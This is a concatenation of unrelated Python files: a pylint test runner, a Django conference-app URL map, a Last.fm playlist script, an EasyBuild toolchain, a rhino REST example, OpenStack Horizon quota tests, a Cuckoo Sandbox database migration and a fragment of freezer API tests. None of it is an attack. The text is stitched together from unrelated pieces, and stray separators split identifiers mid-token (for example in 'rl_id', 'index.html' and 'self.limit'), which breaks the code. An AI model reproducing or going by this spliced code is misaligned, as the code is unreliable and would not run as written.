return LINE_RGX.sub('\n', string)
else:
def ulines(string):
return string
INFO_TEST_RGX = re.compile('^func_i\d\d\d\d$')
def exception_str(ex):
"""function used to replace default __str__ method of exception instances"""
return 'in %s\n:: %s' % (ex.file, ', '.join(ex.args))
class LintTestUsingModule(testlib.TestCase):
DEFAULT_PACKAGE = 'input'
package = DEFAULT_PACKAGE
linter = linter
module = None
depends = None
_TEST_TYPE = 'module'
def shortDescription(self):
values = { 'mode' : self._TEST_TYPE,
'input': self.module,
'pkg': self.package,
'cls': self.__class__.__name__}
if self.package == self.DEFAULT_PACKAGE:
msg = '%(mode)s test of input file "%(input)s" (%(cls)s)'
else:
msg = '%(mode)s test of input file "%(input)s" in "%(pkg)s" (%(cls)s)'
return msg % values
def test_functionality(self):
tocheck = [self.package+'.'+self.module]
if self.depends:
tocheck += [self.package+'.%s' % name.replace('.py', '')
for name, file in self.depends]
self._test(tocheck)
def _test(self, tocheck):
if INFO_TEST_RGX.match(self.module):
self.linter.enable_message_category('I')
else:
self.linter.disable_message_category('I')
try:
self.linter.check(tocheck)
except Exception, ex:
# need finalization to restore a correct state
self.linter.reporter.finalize()
ex.file = tocheck
ex.__str__ = new.instancemethod(exception_str, ex, None)
raise
if self.module.startswith('func_noerror_'):
expected = ''
else:
output = open(self.output)
expected = output.read().strip()
output.close()
got = self.linter.reporter.finalize().strip()
try:
self.assertLinesEquals(got, expected)
except Exception, ex:
# doesn't work with py 2.5
#ex.file = tocheck
#ex.__str__ = new.instancemethod(exception_str, ex, None)
raise AssertionError('%s: %s' % (self.module, ex)), None, sys.exc_info()[-1]
class LintTestUsingFile(LintTestUsingModule):
_TEST_TYPE = 'file'
def test_functionality(self):
tocheck = [self.package+'/' + self.module + '.py']
if self.depends:
tocheck += [self.package+'/%s' % name for name, file in self.depends]
self._test(tocheck)
class TestTests(testlib.TestCase):
"""check that all testable messages have been checked"""
@testlib.tag('coverage')
def test_exhaustivity(self):
# skip fatal messages
todo = [msgid for msgid in linter._messages.keys() if msgid[0] != 'F']
for msgid in test_reporter.message_ids.keys():
try:
todo.remove(msgid)
except ValueError:
continue
todo.sort()
if PY25:
self.assertEqual(todo, ['E0503', 'I0001'])
elif PY23:
self.assertEqual(todo, ['E0503', 'I0001'])
else: # python < 2.3
self.assertEqual(todo, ['I0001'])
#bycat = {}
#for msgid in linter._messages.keys():
# bycat[msgid[0]] = bycat.setdefault(msgid[0], 0) + 1
#for cat, val in bycat.items():
# print '%s: %s' % (cat, val)
#print 'total', sum(bycat.values())
#
# on 2007/02/17:
#
# W: 48
# E: 42
# R: 15
# C: 13
# F: 7
# I: 5
# total 130
def make_tests(filter_rgx):
"""generate tests classes from test info
return the list of generated test classes
"""
if filter_rgx:
is_to_run = re.compile(filter_rgx).search
else:
is_to_run = lambda x: 1
tests = []
for module_file, messages_file in get_tests_info('func_', '.py') + [('nonexistant', 'messages/nonexistant.txt')]:
# skip those tests with python >= 2.3 since py2.3 detects them by itself
if PY23 and module_file == "func_unknown_encoding.py": #"func_nonascii_noencoding.py"):
continue
pyrestr = module_file.rsplit('_py', 1)[-1][:-3]
if pyrestr.isdigit(): # '24', '25'...
if sys.version_info < tuple([int(i) for i in pyrestr]):
continue
if not is_to_run(module_file):
continue
base = module_file.replace('func_', '').replace('.py', '')
dependencies = get_tests_info(base, '.py')
class LintTestUsingModuleTC(LintTestUsingModule):
module = module_file.replace('.py', '')
output = messages_file
depends = dependencies or None
tags = testlib.Tags(('generated','pylint_input_%s' % module))
tests.append(LintTestUsingModuleTC)
if MODULES_ONLY:
continue
class LintTestUsingFileTC(LintTestUsingFile):
module = module_file.replace('.py', '')
output = exists(messages_file + '2') and (messages_file + '2') or messages_file
depends = dependencies or None
tags = testlib.Tags(('generated', 'pylint_input_%s' % module))
tests.append(LintTestUsingFileTC)
## # special test for f0003
## module_file, messages_file in get_tests_info('func_f0003', '.pyc')
## class LintTestSubclass(LintTest):
## module = module_file.replace('.pyc', '')
## output = messages_file
## depends = dependencies or None
## tests.append(LintTestSubclass)
class LintBuiltinModuleTest(LintTestUsingModule):
output = 'messages/builtin_module.txt'
module = 'sys'
def test_functionality(self):
self._test(['sys'])
tests.append(LintBuiltinModuleTest)
if not filter_rgx:
# test all features are tested :)
tests.append(TestTests)
return tests
FILTER_RGX = None
MODULES_ONLY = False
def suite():
return unittest.TestSuite([unittest.makeSuite(test)
for test in make_tests(FILTER_RGX)])
if __name__=='__main__':
if '-m' in sys.argv:
MODULES_ONLY = True
sys.argv.remove('-m')
if len(sys.argv) > 1:
FILTER_RGX = sys.argv[1]
del sys.argv[1]
testlib.unittest_main(defaultTest='suite')
|
from django.conf.urls import url, include
from django.conf.urls.static import static
from django.conf import settings
from django.contrib import admin
from django.urls import path
from confla import views
app_name = "confla"
urlpatterns = [
path('admin/', admin.site.urls),
url(r'^$', views.IndexView.my_view, name='index'),
url(r'add_rooms/$', views.AddRoomsView.view_form, name='add_rooms'),
url(r'^events/popover/$', views.EventView.get_popover, name='eventPop'),
url(r'^events/modal/$', views.EventEditView.event_modal, name='eventMod'),
url(r'^login/$', views.LoginView.my_view, name='login'),
url(r'^logout/$', views.LoginView.logout, name='logout'),
url(r'^process/$', views.LoginView.auth_and_login, name='process_login'),
url(r'^users/$', views.UserView.my_view, name='users'),
url(r'^user/(?P<url_username>\w+)/profile/$', views.UserView.view_profile, name='profile'),
url(r'^user/(?P<url_username>\w+)/delete_mail/(?P<id>\d+)/', views.UserView.delete_email, name='delete_email'),
url(r'^user/(?P<url_username>\w+)/set_primary_mail/(?P<id>\d+)/', views.UserView.set_email_primary, name='set_primary_email'),
url(r'^user/volunteer/$', views.VolunteerView.my_view, name='volunteer'),
url(r'^register/$', views.RegisterView.user_register, name='register'),
url(r'^reset_password/$', views.RegisterView.reset_password, name='reset_password'),
url(r'^reset_password2/(?P<email_address>[^/]+)/(?P<token>[^/]+)$', views.RegisterView.reset_password2, name='reset_password2'),
#url(r'^reg_talk/$', views.RegisterView.save_form_and_register, name='reg_talk'),
#url(r'^notlogged/$', views.UserView.not_logged, name='notlogged'),
url(r'^i18n/', include('django.conf.urls.i18n'), name='set_language'),
url(r'^(?P<url_id>\w+)/$', views.AboutView.splash_view, name='splash'),
url(r'^(?P<url_id>\w+)/cfp/$', views.CfpView.save_form_and_register, name='cfp'),
url(r'^(?P<url_id>\w+)/about/$', views.AboutView.splash_view, name='about'),
url(r'^(?P<u | rl_id>\w+)/events/$', views.EventView.event_list, name='event_list'),
| url(r'^(?P<url_id>\w+)/places/$', views.PlacesView.osm, name='places'),
url(r'^(?P<url_id>\w+)/about/(?P<page>\w+)$', views.PagesView.content, name='pages'),
url(r'^(?P<url_id>\w+)/speakers/grid/$', views.UserView.speaker_grid, name='speaker_grid'),
url(r'^(?P<url_id>\w+)/speakers/list/$', views.UserView.speaker_list, name='speaker_list'),
url(r'^(?P<url_id>\w+)/sched/$', views.ScheduleView.my_view, name='schedule'),
url(r'^(?P<url_id>\w+)/sched/list/$', views.ScheduleView.list_view, name='listsched'),
url(r'^(?P<url_id>\w+)/sched/list/(?P<id>\d+)/$', views.ScheduleView.list_view, name='listschedTag'),
url(r'^(?P<url_id>\w+)/config/$', views.RoomConfView.slot_view, name='conf_rooms'),
url(r'^(?P<url_id>\w+)/config/save/$', views.RoomConfView.save_config, name='rooms_conf_save'),
url(r'^(?P<url_id>\w+)/export/m_app/$', views.ExportView.m_app, name='export_mapp'),
url(r'^(?P<url_id>\w+)/export/csv/$', views.ExportView.csv, name='export_csv'),
url(r'^org/admin/geo_icons/$', views.IconsView.table, name='geo_icons'),
url(r'^org/admin/geo_points/$', views.PlacesView.table, name='geo_points'),
url(r'^org/admin/stats/$', views.AdminView.dashboard, name='org_dashboard'),
url(r'^org/admin/newconf/$', views.ConferenceView.create_conf, name='create_conf'),
url(r'^org/admin/createroom/$', views.ConferenceView.create_room, name='create_room'),
url(r'^org/admin/createtag/$', views.EventEditView.create_event_tag, name='create_event_tag'),
url(r'^org/admin/saveconf/$', views.ConferenceView.save_conf, name='save_conf'),
url(r'^org/admin/users/$', views.AdminView.users, name='org_users'),
url(r'^org/admin/$', views.AdminView.conf_list, name='org_conf_list'),
url(r'^export/conference_list/$', views.ExportView.conf_list, name='conf_list_export'),
url(r'^(?P<url_id>\w+)/admin/$', views.AdminView.dashboard, name='dashboard'),
url(r'^(?P<url_id>\w+)/admin/conf/edit/$', views.ConferenceView.edit_conf, name='edit_conf'),
url(r'^(?P<url_id>\w+)/admin/saveconf/$', views.ConferenceView.save_conf, name='save_conf_urlid'),
url(r'^(?P<url_id>\w+)/admin/pages/$', views.PagesView.pages_list, name='admin_pages'),
url(r'^(?P<url_id>\w+)/admin/page/(?P<page>\d+)/edit/$', views.PagesView.edit_page, name='edit_page'),
url(r'^(?P<url_id>\w+)/admin/page/(?P<page>\d+)/save/$', views.PagesView.save_page, name='save_page'),
url(r'^(?P<url_id>\w+)/admin/users/$', views.AdminView.users, name='speakers'),
url(r'^(?P<url_id>\w+)/admin/sched/edit/$', views.TimetableView.view_timetable, name='adminsched'),
url(r'^(?P<url_id>\w+)/admin/sched/edit/saveTable/$', views.TimetableView.save_timetable, name='saveTable'),
url(r'^(?P<url_id>\w+)/admin/sched/edit/saveEvent/$', views.TimetableView.save_event, name='saveEvent'),
url(r'^(?P<url_id>\w+)/admin/sched/edit/popover/$', views.EventView.get_admin_popover, name='eventPop_admin'),
url(r'^(?P<url_id>\w+)/admin/eventlist/$', views.EventEditView.event_view, name='editEvent'),
url(r'^(?P<url_id>\w+)/admin/eventlist/(?P<id>\d+)/$', views.EventEditView.event_view, name='editEvent'),
url(r'^(?P<url_id>\w+)/admin/eventlist/editEvent/(?P<id>\d+)/$', views.EventEditView.event_save, name='editEvent2'),
url(r'^(?P<url_id>\w+)/admin/import/$', views.ImportView.import_view, name='import'),
url(r'^(?P<url_id>\w+)/admin/import/json/$', views.ImportView.json_upload, name='json_import'),
url(r'^(?P<url_id>\w+)/admin/export/$', views.ExportView.export_view, name='export'),
url(r'^activate/(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$',views.RegisterView.activate_email , name='activate_email'),
]
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
from pprint import pprint
from django.shortcuts import render
def index(request):
return render(request, 'itat/ind | ex.html')
| |
# -*- coding: utf-8 -*-
import ConfigParser, sys, os, urllib2, json, time, shutil, filecmp
import Levenshtein
config = ConfigParser.ConfigParser()
config.read("config.ini")
def clean(chaine):
#print chaine
return chaine.lower().strip()
def decode(chaine):
chaine = chaine.replace(u"\u2018", "'").replace(u"\u2019", "'")
try:
chaine = unicodedata.normalize('NFKD', chaine).encode('ascii','ignore')
return chaine
except:
return chaine
def remove_accents(input_str):
try:
nkfd_form = unicodedata.normalize('NFKD', unicode(input_str))
return u"".join([c for c in nkfd_form if not unicodedata.combining(c)])
except:
return input_str
def cc(i):
return decode(clean(remove_accents(i)))
def getKey(item):
return item[0]
class playlist:
def __init__(self, limit, page=1, period="overall"):
self.api_key = config.get("lastfm",'key')
self.music_dir = config.get("lastfm",'directory')
self.page = page
self.mp_dir = config.get("lastfm",'mudir')
self.user = config.get("lastfm",'user')
self.dossier = os.listdir(self.music_dir)
self.period = period
self.limit = limit
self.notfound = []
#for i in req!
def lastfm(self, meth):
try:
url = 'http://ws.audioscrobbler.com/2.0/?api_key='+self.api_key+'&autocorrect=1'+meth+'&format=json&page='+str(self.page)
txt = urllib2.urlopen(url).read()
return json.loads(txt)
except urllib2.HTTPError:
#print '\n Error : '+art
return None
def toptracks(self):
url = '&method=user.gettoptracks&user='+self.user+'&limit='+self.limit+'&period='+self.period;
req = self.lastfm(url)
for i in req["toptracks"]["track"]:
#if cc(i['artist']['name']) == "high tone":
yield {'name':i['name'],'artist':cc(i['artist']['name'])}
"""Rechercher le dossier artiste, exacte ou levenshtein inferieure a longueur moins 2"""
def findartist(self, artist):
textlog = " find (" + artist + "):\n"
lev = {}
# Chaque artiste dans le dossier
for art in self.dossier:
ar = cc(art)
# Correspondance exacte (pas de majuscule, pas d'accents, pas d'expace)
if ar == artist:
##print "YES BITCH"
return art
# Distance de levenshtein: on stocke si pas trop de difference
elif abs(len(ar) - len(artist)) < 5:
l = Levenshtein.distance(ar, artist)
if l < (len(art)/2):
if not l in lev.keys():
lev[l] = []
lev[l].append(art)
# On process
textlog += str(lev) + "\n"
if lev != {} and len( lev[min(lev.keys())] ) == 1:
##print lev[min(lev.keys())][0]
##print "YES BIS BITCHY BITCH"
return lev[min(lev.keys())][0]
else:
pass ##print textlog
"""Rechercher le dossier artiste, exacte ou levenshtein inferieure a longueur moins 2"""
def findtrack(self, artist, track, i=0, lev=False):
# Chaque truc dans le dossier
base = self.music_dir + "/" + artist
for fil in os.listdir(base):
if os.path.isdir(base +"/"+ fil):
##print ("findtrack " + artist + " / " + fil + " - " + track)
try:
for result in self.findtrack(artist + "/" + fil, track, i=i+1, lev=lev):
yield result
except UnicodeDecodeError:
pass
if os.path.isfile(base +"/"+ fil):
if lev:
nfil = cc(clean(unicode(fil[:-4],'utf-8')))
ntr = cc(clean(track))
l = Levenshtein.distance(ntr, nfil)
if l < len(ntr):
##print "lev |" + ntr + "|" + nfil + "|"
##print str(l) + " - " + str(len(cc(track)))
yield [l, base+"/"+fil]
else:
if clean(track) in clean(unicode(fil,'utf-8')):
##print base+"/"+fil
yield base+"/"+fil
def mkdirs(self, li, pat):
if li != []:
dd = os.path.join(pat, li[0])
if not os.path.isdir( dd ):
##print "mkdir(" + dd+")"
os.mkdir(dd)
return self.mkdirs(li[1:], dd)
else:
return pat
def move(self, t):
dirs = t[len(self.music_dir)+1:].split("/")
new = self.mkdirs(dirs[:-1], self.mp_dir)
dst = os.path.join(new, dirs[-1])
if os.path.isfile( dst ):
if os.path.getsize(t) != os.path.getsize(dst):
os.remove(dst)
else:
return 1
shutil.copyfile(t, dst)
##print "exist"
#shutil.copyfile(t, dst)
def findtrackall(self, a, i):
for t in self.findtrack(a, i['name | ']):
return t
##print "### :: " + i['artist'] + '-' + i['name'] + ""
ties = []
for t in self.findtrack(a, i['name'], lev=True):
ties.append(t)
if len(ties) == 0:
return 0
if len(ties) == 1:
##print ties[0][1]
return ties[0][1]
else:
ties = sorted(ties, key=getKey)
##print ties[0][1]
return ties[0][1]
def run(self):
file = time.strftime("TOP"+se | lf.limit+"_%m%d%H%M.m3u")
fo = open(file, 'w+')
number = 0
for i in self.toptracks():
number += 1
print number
#for i in [{'name':u"The sound of silence",'artist':u"Simon and Garfunkel"}]:
a = self.findartist(i['artist'])
t = 0
if a:
t = self.findtrackall(a, i)
if t == 0:
t = self.findtrackall("Various Artists", i)
##print t
if t != 0:
fo.write(t+"\n")
if os.path.isdir( self.mp_dir ):
self.move(t)
else:
#print "###########"
#print i['artist'] + '-' + i['name']
pass
#print self.notfound
#print '--finished--'
fo.close()
# <?xml version="1.0" encoding="UTF-8"?>
# <playlist version="1" xmlns="http://xspf.org/ns/0/">
# <trackList>
# <track><location>file:///media/data/Musique/Cypress Hill/2010 - Rise Up/Cypress Hill - Rise Up - 13 - Armed and Dangerous.mp3</location></track>
# <track><location>file:///media/data/Musique/The Black Keys/Attack & Release/The Black Keys - Psychotic Girl.mp3</location></track>
# <track><location>file:///media/data/Musique/Odezenne/2012 - OVNI edition Louis XIV/13 - Hirondelles.mp3</location></track>
# </trackList>
# </playlist>
pass
if len(sys.argv) == 0 :
print "usage : python playlist.py length page"
else:
if len(sys.argv) <= 1 :
p = playlist(100)
elif len(sys.argv) <= 2 :
p = playlist(sys.argv[1])
elif len(sys.argv) <= 3 :
p = playlist(sys.argv[1], sys.argv[2])
else: p = playlist(sys.argv[1], sys.argv[2], sys.argv[3])
p.run()
|
##
# Copyright 2012-2021 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://ww | w.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# https://github.com/easybuilders/easybuild
# |
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for gomkl compiler toolchain (includes GCC, OpenMPI,
Intel Math Kernel Library (MKL) and Intel FFTW wrappers).
:author: Stijn De Weirdt (Ghent University)
:author: Kenneth Hoste (Ghent University)
:author: Ake Sandgren (Umea University)
"""
from easybuild.toolchains.gompi import Gompi
from easybuild.toolchains.gmkl import Gmkl
from easybuild.toolchains.fft.intelfftw import IntelFFTW
from easybuild.toolchains.linalg.intelmkl import IntelMKL
class Gomkl(Gompi, IntelMKL, IntelFFTW):
"""Compiler toolchain with GCC, OpenMPI, Intel Math Kernel Library (MKL) and Intel FFTW wrappers."""
NAME = 'gomkl'
SUBTOOLCHAIN = [Gompi.NAME, Gmkl.NAME]
|
import json
from rhino import Mapper, get
# Our internal representation
report = {
'title': 'foo',
'author': 'Fred',
'date': '2015-01-09',
'tags': ['a', 'b', 'c'],
}
# Base class for our representations
class report_repr(object):
@classmethod
def serialize(cls, report):
obj = dict([(k, report | [k]) for k in cls.fields])
return json.dumps(obj, sort_keys=True)
# Different versions of the representation
class report_v1(report_repr):
provides = 'application/vnd.acme.report+json;v=1'
fields = ['title', 'author']
class report_v2(report_repr):
provides = 'application/vnd.acme.report+json;v=2'
fields = ['title', 'author', ' | date']
class report_v3(report_repr):
provides = 'application/vnd.acme.report+json;v=3'
fields = ['title', 'author', 'date', 'tags']
# One handler can handle multiple representations.
# Here, report_v3 is the default when the client doesn't specify a preference.
@get(produces=report_v1)
@get(produces=report_v2)
@get(produces=report_v3)
def get_report(request):
return report
app = Mapper()
app.add('/', get_report)
if __name__ == '__main__':
app.start_server()
|
# Copyright 2013 Kylin, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.urls import reverse
import mock
from openstack_dashboard import api
from openstack_dashboard.test import helpers as test
from openstack_dashboard.usage import quotas
INDEX_URL = reverse('horizon:admin:defaults:index')
class ServicesViewTests(test.BaseAdminViewTests):
@test.create_mocks({
api.nova: [('default_quota_get', 'nova_default_quota_get')],
api.cinder: [('default_quota_get', 'cinder_default_quota_get'),
'is_volume_service_enabled'],
api.base: ['is_service_enabled'],
api.neutron: [('default_quota_get', 'neutron_default_quota_get')],
quotas: ['enabled_quotas']})
def test_index(self):
# Neutron does not have an API for getting default system
# quotas. When not using Neutron, the floating ips quotas
# should be in the list.
self.mock_is_volume_service_enabled.return_value = True
self.mock_is_service_enabled.return_value = True
compute_quotas = [q.name for q in self.quotas.nova]
self.mock_enabled_quotas.return_value = compute_quotas
self.mock_nova_default_quota_get.return_value = self.quotas.nova
self.mock_cinder_default_quota_get.return_value = \
self.cinder_quotas.first()
self.mock_neutron_default_quota_get.return_value = \
sel | f.neutron_quotas.first()
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'admin/defaults/index.html')
expected_data = [
'<Quota: (injected_file_con | tent_bytes, 1)>',
'<Quota: (metadata_items, 1)>',
'<Quota: (injected_files, 1)>',
'<Quota: (ram, 10000)>',
'<Quota: (instances, 10)>',
'<Quota: (cores, 10)>',
'<Quota: (key_pairs, 100)>',
'<Quota: (server_groups, 10)>',
'<Quota: (server_group_members, 10)>',
'<Quota: (injected_file_path_bytes, 255)>',
]
self._check_quotas_data(res, 'compute_quotas', expected_data)
expected_data = [
'<Quota: (gigabytes, 1000)>',
'<Quota: (snapshots, 1)>',
'<Quota: (volumes, 1)>',
]
self._check_quotas_data(res, 'volume_quotas', expected_data)
expected_data = [
'<Quota: (network, 10)>',
'<Quota: (subnet, 10)>',
'<Quota: (port, 50)>',
'<Quota: (router, 10)>',
'<Quota: (floatingip, 50)>',
'<Quota: (security_group, 20)>',
'<Quota: (security_group_rule, 100)>',
]
self._check_quotas_data(res, 'network_quotas', expected_data)
self.mock_is_volume_service_enabled.assert_called_once_with(
test.IsHttpRequest())
self.assertEqual(2, self.mock_is_service_enabled.call_count)
self.mock_is_service_enabled.assert_has_calls([
mock.call(test.IsHttpRequest(), 'compute'),
mock.call(test.IsHttpRequest(), 'network')])
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_enabled_quotas, 4,
mock.call(test.IsHttpRequest()))
self.mock_nova_default_quota_get.assert_called_once_with(
test.IsHttpRequest(), self.tenant.id)
self.mock_cinder_default_quota_get.assert_called_once_with(
test.IsHttpRequest(), self.tenant.id)
self.mock_neutron_default_quota_get.assert_called_once_with(
test.IsHttpRequest())
def _check_quotas_data(self, res, slug, expected_data):
quotas_tab = res.context['tab_group'].get_tab(slug)
self.assertQuerysetEqual(quotas_tab._tables[slug].data,
expected_data,
ordered=False)
class UpdateDefaultQuotasTests(test.BaseAdminViewTests):
def _get_quota_info(self, quota):
quota_data = {}
updatable_quota_fields = (quotas.NOVA_QUOTA_FIELDS |
quotas.CINDER_QUOTA_FIELDS)
for field in updatable_quota_fields:
if field != 'fixed_ips':
limit = quota.get(field).limit or 10
quota_data[field] = int(limit)
return quota_data
@test.create_mocks({
api.nova: [('default_quota_update', 'nova_default_quota_update'),
('default_quota_get', 'nova_default_quota_get')],
api.cinder: [('default_quota_update', 'cinder_default_quota_update'),
('default_quota_get', 'cinder_default_quota_get')],
quotas: ['get_disabled_quotas']})
def test_update_default_quotas(self):
quota = self.quotas.first() + self.cinder_quotas.first()
self.mock_get_disabled_quotas.return_value = set()
self.mock_nova_default_quota_get.return_value = self.quotas.first()
self.mock_nova_default_quota_update.return_value = None
self.mock_cinder_default_quota_get.return_value = \
self.cinder_quotas.first()
self.mock_cinder_default_quota_update.return_value = None
# update some fields
quota[0].limit = 123
quota[1].limit = -1
updated_quota = self._get_quota_info(quota)
url = reverse('horizon:admin:defaults:update_defaults')
res = self.client.post(url, updated_quota)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
self.mock_get_disabled_quotas.assert_called_once_with(
test.IsHttpRequest())
nova_fields = quotas.NOVA_QUOTA_FIELDS
nova_updated_quota = dict((key, updated_quota[key]) for key in
nova_fields if key != 'fixed_ips')
self.mock_nova_default_quota_get.assert_called_once_with(
test.IsHttpRequest(), self.request.user.tenant_id)
self.mock_nova_default_quota_update.assert_called_once_with(
test.IsHttpRequest(), **nova_updated_quota)
cinder_updated_quota = dict((key, updated_quota[key]) for key in
quotas.CINDER_QUOTA_FIELDS)
self.mock_cinder_default_quota_get.assert_called_once_with(
test.IsHttpRequest(), self.request.user.tenant_id)
self.mock_cinder_default_quota_update.assert_called_once_with(
test.IsHttpRequest(), **cinder_updated_quota)
|
# Copyright (C) 2010-2013 Claudio Guarnieri.
# Copyright (C) 2014-2016 Cuckoo Foundation.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
"""Added failed statuses to tasks (from Cuckoo 1.1 to 1.2)
Revision ID: 495d5a6edef3
Revises: 18eee46c6f81
Create Date: 2015-02-28 19:08:29.284111
"""
# Spaghetti as a way of life.
# Revision identifiers, used by Alembic.
revision = "495d5a6edef3"
down_revision = "18eee46c6f81"
import sqlalchemy as sa
from datetime import datetime
from alembic import op
from dateutil.parser import parse
import cuckoo.core.database as db
def upgrade():
conn = op.get_bind()
# Deal with Alembic shit.
# Alembic is so ORMish that it was impossible to write code which works on different DBMS.
if conn.engine.driver == "psycopg2":
# Altering status ENUM.
# This shit of raw SQL is here because alembic doesn't deal well with alter_colum of ENUM type.
# Commit because SQLAlchemy doesn't support ALTER TYPE in a transaction.
op.execute('COMMIT')
conn.execute("ALTER TYPE status_type ADD VALUE 'failed_reporting'")
else:
# Read data.
tasks_data = []
old_tasks = conn.execute("select id, target, category, timeout, priority, custom, machine, package, options, platform, memory, enforce_timeout, clock, added_on, started_on, completed_on, status, sample_id from tasks").fetchall()
for item in old_tasks:
d = {}
| d["id"] = item[0]
d["target"] = item[1]
| d["category"] = item[2]
d["timeout"] = item[3]
d["priority"] = item[4]
d["custom"] = item[5]
d["machine"] = item[6]
d["package"] = item[7]
d["options"] = item[8]
d["platform"] = item[9]
d["memory"] = item[10]
d["enforce_timeout"] = item[11]
if isinstance(item[12], datetime):
d["clock"] = item[12]
elif item[12]:
d["clock"] = parse(item[12])
else:
d["clock"] = None
if isinstance(item[13], datetime):
d["added_on"] = item[13]
elif item[13]:
d["added_on"] = parse(item[13])
else:
d["added_on"] = None
if isinstance(item[14], datetime):
d["started_on"] = item[14]
elif item[14]:
d["started_on"] = parse(item[14])
else:
d["started_on"] = None
if isinstance(item[15], datetime):
d["completed_on"] = item[15]
elif item[15]:
d["completed_on"] = parse(item[15])
else:
d["completed_on"] = None
d["status"] = item[16]
d["sample_id"] = item[17]
tasks_data.append(d)
if conn.engine.driver == "mysqldb":
# Disable foreign key checking to migrate table avoiding checks.
op.execute('SET foreign_key_checks = 0')
# Drop old table.
op.drop_table("tasks")
# Drop old Enum.
sa.Enum(name="status_type").drop(op.get_bind(), checkfirst=False)
# Create table with 1.2 schema.
op.create_table(
"tasks",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("target", sa.String(length=255), nullable=False),
sa.Column("category", sa.String(length=255), nullable=False),
sa.Column("timeout", sa.Integer(), server_default="0", nullable=False),
sa.Column("priority", sa.Integer(), server_default="1", nullable=False),
sa.Column("custom", sa.String(length=255), nullable=True),
sa.Column("machine", sa.String(length=255), nullable=True),
sa.Column("package", sa.String(length=255), nullable=True),
sa.Column("options", sa.String(length=255), nullable=True),
sa.Column("platform", sa.String(length=255), nullable=True),
sa.Column("memory", sa.Boolean(), nullable=False, default=False),
sa.Column("enforce_timeout", sa.Boolean(), nullable=False, default=False),
sa.Column("clock", sa.DateTime(timezone=False), default=datetime.now, nullable=False),
sa.Column("added_on", sa.DateTime(timezone=False), nullable=False),
sa.Column("started_on", sa.DateTime(timezone=False), nullable=True),
sa.Column("completed_on", sa.DateTime(timezone=False), nullable=True),
sa.Column("status", sa.Enum("pending", "running", "completed", "reported", "recovered", "failed_analysis", "failed_processing", "failed_reporting", name="status_type"), server_default="pending", nullable=False),
sa.Column("sample_id", sa.Integer, sa.ForeignKey("samples.id"), nullable=True),
sa.PrimaryKeyConstraint("id")
)
op.execute('COMMIT')
# Insert data.
op.bulk_insert(db.Task.__table__, tasks_data)
# Enable foreign key.
op.execute('SET foreign_key_checks = 1')
else:
op.drop_table("tasks")
# Create table with 1.2 schema.
op.create_table(
"tasks",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("target", sa.String(length=255), nullable=False),
sa.Column("category", sa.String(length=255), nullable=False),
sa.Column("timeout", sa.Integer(), server_default="0", nullable=False),
sa.Column("priority", sa.Integer(), server_default="1", nullable=False),
sa.Column("custom", sa.String(length=255), nullable=True),
sa.Column("machine", sa.String(length=255), nullable=True),
sa.Column("package", sa.String(length=255), nullable=True),
sa.Column("options", sa.String(length=255), nullable=True),
sa.Column("platform", sa.String(length=255), nullable=True),
sa.Column("memory", sa.Boolean(), nullable=False, default=False),
sa.Column("enforce_timeout", sa.Boolean(), nullable=False, default=False),
sa.Column("clock", sa.DateTime(timezone=False), default=datetime.now, nullable=False),
sa.Column("added_on", sa.DateTime(timezone=False), nullable=False),
sa.Column("started_on", sa.DateTime(timezone=False), nullable=True),
sa.Column("completed_on", sa.DateTime(timezone=False), nullable=True),
sa.Column("status", sa.Enum("pending", "running", "completed", "reported", "recovered", "failed_analysis", "failed_processing", "failed_reporting", name="status_type"), server_default="pending", nullable=False),
sa.Column("sample_id", sa.Integer, sa.ForeignKey("samples.id"), nullable=True),
sa.PrimaryKeyConstraint("id")
)
# Insert data.
op.bulk_insert(db.Task.__table__, tasks_data)
def downgrade():
pass
|
self.fake_action_2.get('max_retries'))
self.assertEqual(result.get('max_retries_interval'),
self.fake_action_2.get('max_retries_interval'))
freezer_action = result.get('freezer_action')
self.assertEqual(freezer_action.get('action'),
self.freezer_action_2.get('action'))
patch_doc1 = copy.deepcopy(self.fake_action_0)
result = self.dbapi.replace_action(project_id=self.fake_project_id,
user_id=self.fake_action_2.
get('user_id'),
doc=patch_doc1,
action_id=self.fake_action_id)
self.assertIsNotNone(result)
result = self.dbapi.get_action(project_id=self.fake_project_id,
user_id=self.fake_action_2.
get('user_id'),
action_id=self.fake_action_id)
self.assertEqual(result.get('action_id'), self.fake_action_id)
def test_add_and_search_action(self):
count = 0
actionids = []
while(count < 20):
doc = copy.deepcopy(self.fake_action_3)
action_id = common.get_fake_action_id()
doc['action_id'] = action_id
result = self.dbapi.add_action(user_id=self.fake_action_3.
get('user_id'),
doc=doc,
project_id=self.fake_project_id)
self.assertIsNotNone(result)
self.assertEqual(result, action_id)
actionids.append(action_id)
count += 1
result = self.dbapi.search_action(project_id=self.fake_project_id,
user_id=self.fake_action_3.
get('user_id'),
limit=10,
offset=0)
self.assertIsNotNone(result)
self.assertEqual(len(result), 10)
for index in range(len(result)):
actionmap = result[index]
